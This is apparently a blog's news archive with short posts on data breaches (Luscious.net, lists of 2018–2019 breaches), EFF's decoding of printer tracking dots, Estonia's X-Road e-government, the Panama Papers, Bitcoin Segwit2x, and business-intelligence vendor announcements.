Archive for the ‘News’ Category

Luscious.net loses 1million user details. According to the team at vpnMentor, an exposed database allowed access to Luscious account holders’ personal details. 

The accessible data included usernames, email addresses, activity logs, and location data for all 1.195 million users.

“Our team was able to access this database because it was completely unsecured and unencrypted,” writes the vpnMentor team. 

If Luscious users happened to use email addresses associated with their real names to register accounts, that information — tied to location data — could be more than enough to associate specific Luscious accounts with their owners. Users’ video uploads to the site were also accessible.

The breach was discovered on Aug. 15, and, after being notified by vpnMentor, Luscious fixed the issue on Aug. 19. That doesn’t mean, however, that no harm was done. 

“While the data breach is now closed,” write the researchers, “it’s still possible that other hackers could have accessed it earlier and extracted the same data we viewed.” 

“A greater issue of concern is the fact that many users joined Luscious on official government emails,” notes vpnMentor. “We found examples of this from users in Brazil, Australia, Italy, Malaysia, and Australia.”

The 2015 Ashley Madison hack demonstrated how this type of information is practically designed for blackmail. In that case, a dating site purportedly offering to put married men in touch with women was breached, and its database consisting of usernames and emails fell into the hands of hackers.

Organisation have had it easy for some time. Data breaches are increasingly being addressed with penalties backed by GDPR legislation. Some noted fines are:

British Airways was fined $328M. Facebook fined $5B for Cambridge Analytica data theft. $99M for Marriott Hotel

In Australia, the OAIC reports that it received 812 privacy complaints in 2018.

Entity Records Organization type Method 2019 Bulgarian revenue agency hack over 5,000,000 government hacked Canva 140,000,000 web hacked Capital One 106,000,000 financial hacked Desjardins 2,900,000 financial inside job Facebook 540,000,000 social network poor security Facebook 1,500,000 social network accidentally uploaded First American Corporation 885,000,000 financial service company poor security Health Sciences Authority (Singapore) 808,000 healthcare poor security Justdial 100,000,000 local search unprotected api Ministry of Health (Singapore) 14,200 healthcare poor security/inside job Quest Diagnostics 11,900,000 Clinical Laboratory poor security StockX 6,800,000 retail hacked Truecaller 299,055,819 Telephone directory unknown Woodruff Arts Center unknown arts group poor security Westpac 98,000 financial hacked Australian National University 19 years of data academic hacked

Here are a few links to fines noted.

https://www.abc.net.au/news/2019-07-08/british-airways-cybercrime-credit-card-hack-fine/11289738

#10 — Panera

Number of victims: 37 millionWho was targeted: All PaneraBread.com customer accountsWhat data was exposed: Names, email and physical addresses, birthdays, and the last four digits of the customers’ credit card numbersTimeframe: Disclosed April 2018What happened: Despite being warned by a cybersecurity expert in August 2017 that their website was leaking data, the Panera IT team failed to act until 8 months later when it announced the leak and took the site down for security maintenance.

#9 — Newegg

Number of victims: 50 millionWho was targeted: Newegg online shoppersWhat data was exposed: Credit card infoTimeframe: August 14, 2018 – September 18, 2018What happened: The online retailer was hacked by cybergang Magecart, who injected a credit card skimming code into the Newegg website. Whenever a customer bought something online, that payment info went straight to Magecart’s C&C (command and control server).

#8 — Elasticsearch

Number of victims: 82 million (57M consumers, 26M businesses)Who was targeted: Users and online businesses across the internetWhat data was exposed: From individual users — names, email and physical addresses, phone numbers, IP addresses, employers, and job titles. From businesses — names, company details, zip codes, carrier routes, latitudes/longitudes, census tracts, phone numbers, web addresses, email addresses, employee count, revenue numbers, NAICS codes, SIC codes, and more.Timeframe: Discovered November 14, 2018What happened: This is one of those cases we mentioned above where a regular security audit led to a researcher stumbling upon over 80 million records of sensitive, aggregated data. It is unknown how long the databases were sitting unguarded and who, if anyone, has had the opportunity to copy and steal all the data. Cybersecurity experts believe they have tracked down the source of the unguarded databases to a data management company that has since closed its doors, but it is still officially unknown.

#7 —  Facebook

Number of victims: 87 millionWho was targeted: Facebook usersWhat data was exposed: Profile info, political beliefs, friend networks, private messagesTimeframe: Disclosed September 2018What happened: This is the notorious Cambridge Analytica scandal where the data-collecting firm illegally harvested users’ info without their permission. The secret operation was politically motivated—namely, to influence the 2016 US presidential campaign. And though the breach occurred a couple years ago, it’s only this year that investigatory conclusions have come out, giving us a clearer picture of what happened.

#6 — MyHeritage

Number of victims: 92 millionWho was targeted: MyHeritage usersWhat data was exposed: email addresses and hashed passwordsTimeframe: Alerted June 2018What happened: Cybersecurity researchers alerted the genealogy site in June 2018 that an outside server had been discovered with sensitive MyHeritage info. The company confirmed the info was legitimate and alerted its users that any account holders who signed up earlier than October 26, 2017 were at risk and should change their passwords.

#5 — Quora

Number of victims: 100 millionWho was targeted: Quora usersWhat data was exposed: Names, email addresses, hashed passwords, profile data, public and non-public actionsTimeframe: Discovered December 3, 2018What happened: Many questions still surround the details of this breach, but the question-and-answer site reported to its users that a third party had gained unauthorized access to one of their systems, expounding no further.  

#4 — Under Armour

Number of victims: 150 millionWho was targeted: MyFitnessPal usersWhat data was exposed: User names, email addresses, hashed passwordsTimeframe: Late February 2018What happened: The company’s food and nutrition app was hacked, opening up the above info to the attackers, but not, thankfully, any payment info, which the company processes through a separate channel.

#3 — Exactis

Number of victims: 340 million (230M consumers, 110M businesses)Who was targeted: Users and businesses across the internetWhat data was exposed: Over 400 categories of detail, such as phone numbers, email and physical addresses, interests, ages, religions, pet ownership, etc.Timeframe: June 2018What happened: Data collection firm Exactis somehow had 2 terabytes of data relocated to a public site for all to see. It’s unknown who or how many people accessed the info before it was discovered.

#2 — Starwood

Number of victims: 500 millionWho was targeted: Starwood guestsWhat data was exposed: Names, email and physical addresses, phone numbers, passport numbers, account info, birth dates, gender, travel info, and accommodation info. Some of the breached info also included hashed credit card info.Timeframe: Discovered September 10, 2018, but could have stretched as far back as 2014What happened: Like many of the other official breach statements, the Marriott-owned hotel chain issued a statement that its servers had suffered “unauthorized access,” but recent discoveries from the investigation indicate the breach may have been caused by the Chinese government for political purposes.

#1 — Aadhaar

Number of victims: 1.1 billionWho was targeted: Indian citizensWhat data was exposed: Aadhaar numbers, names, email and physical addresses, phone numbers, and photosTimeframe: August 2017 – January 2018What happened: Anonymous sellers over WhatsApp charged Rs 500 and lower for a portal into India’s Unique Identification Authority where the records of virtually every citizen was at the payer’s fingertips.

Bitcoin is a crypto-currency which leverages the Blockchain. Similar to a real currency, Bitcoin is hailed as a revolutionary technology for storing value. It’s popularity stems from distrust in real world currencies, the un-regulated printing of currencies like the US Dollar.

Bitcoin is governed by “developers” and infrastructure. Crypto Miners who facilitate the transactions within the Bitcoin ecosystem have a shared consensus to regulate and evolve the Bitcoin economy. Bitcoin has governed parameters which include a limit on quantity, blocksize and others.

Today, the Bitcoin community seeks to evolve Bitcoin with agreed changes. Segwit2x, also known as the New York Agreement, is an industry-wide compromise that CEO and founder of Digital Currency Group Barry Silbert spearheaded in May to activate the Segregated Witness (Segwit) scaling upgrade for Bitcoin. Key mining pools and exchanges that agreed to the aforementioned plan include Bitmain’s Antpool, Btc.top, Bixin, Btcc Pool, F2pool, Huobi, Okcoin, Viabtc, BW, 1Hash, Canoe, Batpool, and Bitkan.

The event and announcement closely follow Bitmain’s release of its hard fork protection plan against UASF BIP148, which CEO Jihan Wu has described as an attack on Bitcoin. He spoke at the Summit on June 14 about how to prevent BIP148 from activating, outlining its weaknesses.

China owns ~80% of Bitcoin mining infrastructure and typically plays a dominant role in the future of Bitcoin.

Read more here.

In 2005, a research team led by the Electronic Frontier Foundation (EFF) broke the code behind tiny tracking dots that some color laser printers secretly hide in every document.

The U.S. Secret Service admitted that the tracking information is part of a deal struck with selected color laser printer manufacturers, ostensibly to identify counterfeiters. However, the nature of the private information encoded in each document was not previously known.

“We’ve found that the dots from at least one line of printers encode the date and time your document was printed, as well as the serial number of the printer,” said EFF Staff Technologist Seth David Schoen.

You can see the dots on color prints from machines made by Xerox, Canon, and other manufacturers (for a list of the printers we investigated so far, see: http://www.eff.org/Privacy/printers/list.php). The dots are yellow, less than one millimeter in diameter, and are typically repeated over each page of a document. In order to see the pattern, you need a blue light, a magnifying glass, or a microscope (for instructions on how to see the dots, see: http://www.eff.org/Privacy/printers/docucolor/).

EFF and its partners began its project to break the printer code with the Xerox DocuColor line. Researchers Schoen, EFF intern Robert Lee, and volunteers Patrick Murphy and Joel Alwen compared dots from test pages sent in by EFF supporters, noting similarities and differences in their arrangement, and then found a simple way to read the pattern.

“So far, we’ve only broken the code for Xerox DocuColor printers,” said Schoen. “But we believe that other models from other manufacturers include the same personally identifiable information in their tracking dots.”

You can decode your own Xerox DocuColor prints using EFF’s automated program at http://www.eff.org/Privacy/printers/docucolor/index.php#program.

Xerox previously admitted that it provided these tracking dots to the government, but indicated that only the Secret Service had the ability to read the code. The Secret Service maintains that it only uses the information for criminal counterfeit investigations. However, there are no laws to prevent the government from abusing this information.

“Underground democracy movements that produce political or religious pamphlets and flyers, like the Russian samizdat of the 1980s, will always need the anonymity of simple paper documents, but this technology makes it easier for governments to find dissenters,” said EFF Senior Staff Attorney Lee Tien. “Even worse, it shows how the government and private industry make backroom deals to weaken our privacy by compromising everyday equipment like printers. The logical next question is: what other deals have been or are being made to ensure that our technology rats on us?”

EFF is still working on cracking the codes from other printers and we need the public’s help. Find out how you can make your own test pages to be included in our research at http://www.eff.org/Privacy/printers/wp.php#testsheets.

 

 

Estonia is a small country bordering Russia, Latvia and Finland. It boasts of an advanced information management platform for government.

This platform is the X-Road platform which is an invisible but crucial backbone for data transactions between the various e-services databases in the public and private sectors. X-Road facilitates harmonious interoperability.

Estonia’s data stores are de-centralised meaning:

There is no single owner / controller Every government agency or business can choose the right products suitable for them Services are added one at a time, as they are ready

All Estonian services that use multiple data stores use X-Road as a central connection between these data stores. All outgoing data from X-Road is digitally signed and encrypted. All incoming data is authenticated and logged.

X-Road was a system built to facilitate multi-data store queries, but has evolved to also facilitate multi-data store writes, and transmit large datasets. It was also designed for growth and currently supports:

287 million queries (2013) Connects 170 database in Estonia Provides 2000 services in Estonia Connects 900 organisations daily Supports >50% of Estonians who use the government portal Eesti.ee

Services provided via X-Road include:

Electronic Registration of residency Updating personal data (like address, exam results, health insurance etc…) Declare taxes electronically Check driving license validity Check for registered vehicles Registering newborn children for health insurance

Estonia showcases its e-society here. To transform its society into a community of digital governance and tech-savvy individuals, children as young as 7 are taught the principles and basics of coding.

Estonians are driven, forward-thinking and entrepreneurial, and the same goes for the government. It takes only five minutes to register a company there and, according to The Economist, the country in 2013 held the world record for the number of startups per person. And it’s not quantity over quality: Many Estonian startups are now successful companies that you may recognize, such as Skype, Transferwise, Pipedrive, Cloutex, Click & Grow, GrabCAD, Erply, Fortumo, Lingvist and others.

If all this sounds enticing and you wish to become an entrepreneur there, you’re in luck; starting a business in Estonia is easy, and you can do it without packing your bags, thanks to its e-residency service, a transnational digital identity available to anyone. An e-resident can not only establish a company in Estonia through the Internet, but they can also have access to other online services that have been available to Estonians for over a decade. This includes e-banking and remote money transfers, declaring Estonian taxes online, digitally signing and verifying contracts and documents, and much more.

E-residents are issued a smart ID card, a legal equivalent to handwritten signatures and face-to-face identification in Estonia and worldwide. The cards themselves are protected by 2048-bit encryption, and the signature/ID functionality is provided by two security certificates stored on the card’s microchip.

But great innovations don’t stop there. Blockchain, the principle behind bitcoin that also secures the integrity of e-residency data, will be used to provide unparalleled safety to 1 million Estonian health records. The blockchain will be used to register any and all changes, illicit or otherwise, done to the health records, protecting their authenticity and effectively eliminating any abuse of the data therein.

There are many lessons we can learn from Estonia. To increases efficiency and maturity of services, a country needs to be willing to adapt and evolve infrastructure to the needs to the new economy. These include transparency, precise and equitable delivery of services to the community.

Are you famous yet? In another case of  “Schadenfreude“, the Panama Papers have placed a list of dignitaries in the public spotlight a year after the German newspaper Süddeutsche Zeitung received 2.6 terabytes of documents related to Mossack Fonseca from an anonymous source. This eclipses Wikileaks Cablegate 2010 (1.7 GB), Offshore Leaks 2013 (260 GB), Lux Leaks 2014 (4 GB), and Swiss Leaks 2015 (3.3 GB).

The Panama Papers comprises e-mails, PDF files, photos, and excerpts of an internal Mossack Fonseca database. It covers a period spanning from the 1970s to the spring of 2016 with data on some 214,000 companies. There is a folder for each shell firm that contains e-mails, contracts, transcripts, and scanned documents. The leak comprises 4,804,618 emails, 3,047,306 database format files, 2,154,264 PDFs, 1,117,026 images, 320,166 text files, and 2,242 files in other formats.

Meet Nuix, the Australian company that has the technology to make sense of all this data.

Congratulations to Pratap Ranade and Ryan Rowe as the web-scaping-as-a-service company which they co-founded (called Kimonolabs) has been acquired by Palantir.

Kimonolabs started as a Winter 2014 Y Combinator class startup. It recently raised USD5M in 2014, but this hasn’t help delaying their choice to shutter their doors for jobs at Palantir.  Pratap explained that the startup has not been able to have the impact it wanted within the two years from launch. So Kimonolabs falls too the wayside where many other web-scaping tools have gone leaving their 125K users in the lurch.

They have given 2 weeks notice to their users to migrate data and services from the platform. The last day is 29 Feb 2016. The absolute last day for API services is 31st March 2016. Your data will be purged and Palantir will not have access to it. If you depend on this service, you will probably be scrambling at this point for alternatives. I am sure that when you assess the risk for utilising a technology like Kimonolabs, you will consider the financial and resource stability of the company.

Here is a list of alternative web scraping tools and technologies. We also recommend utilising established SaaS ETL services as viable alternatives.

 

Periscope Data is a cloud-based business intelligence analytics and distribution platform. Periscope Data has taken the pain out of data loading by directly connecting to your data sources with no messy ETLs.

Periscope visualizes your data into charts, graphs and dashboards. All you need to do is to write SQL queries in Periscope and it returns charts and reports and dashboards that you can share or embed.

Periscope is licensed by the number of data rows you share with Periscope. You can have unlimited users. Your Periscope package includes Unlimited Charts, Unlimited Users, Dashboards, Unlimited Embedding and white-labeling, and Unlimited Support.

Pricing of packages start at $1,000 a month for up to 1 Billion rows of data and scale linearly from there. There is no annual commitment, you can pay month to month.

You can take advantage the Periscope caching tool at no additional cost. Caching reduces load on your database, results in faster performance and gives you the ability to upload csv’s and do cross database joins. Your query speeds will run 150x times faster with Periscope caching.

https://www.periscopedata.com/ http://wiki.glitchdata.com/index.php?title=Periscope_Data

If you haven’t heard of Yellowfin BI, it is a passionate startup focused on making Business Intelligence easy. Established in 2003, Yellowfin has been developed to satisfy a range of BI needs, from small businesses, to massive enterprise deployments and software vendors.

Yellowfin makes a Business Intelligence platform built ontop of Tomcat/Java that processes and presents information in refreshing detail. Its easy to assemble, and allows you to focus on building new business value rapidly. Yellowfin can be deployed on any server (cloud or on premise).

Yellowfin is the second Australian vendor to ever get in the Gartner Magic Quadrant.

Growing organically, it can barely be called a startup these days with >100 employees and offices in 4 different countries. Yellowfin is running a series of presentation of their technology in December. These are:

Melbourne – 1 Dec Sydney – 2 Dec Auckland – 3 Dec

Register for the event today!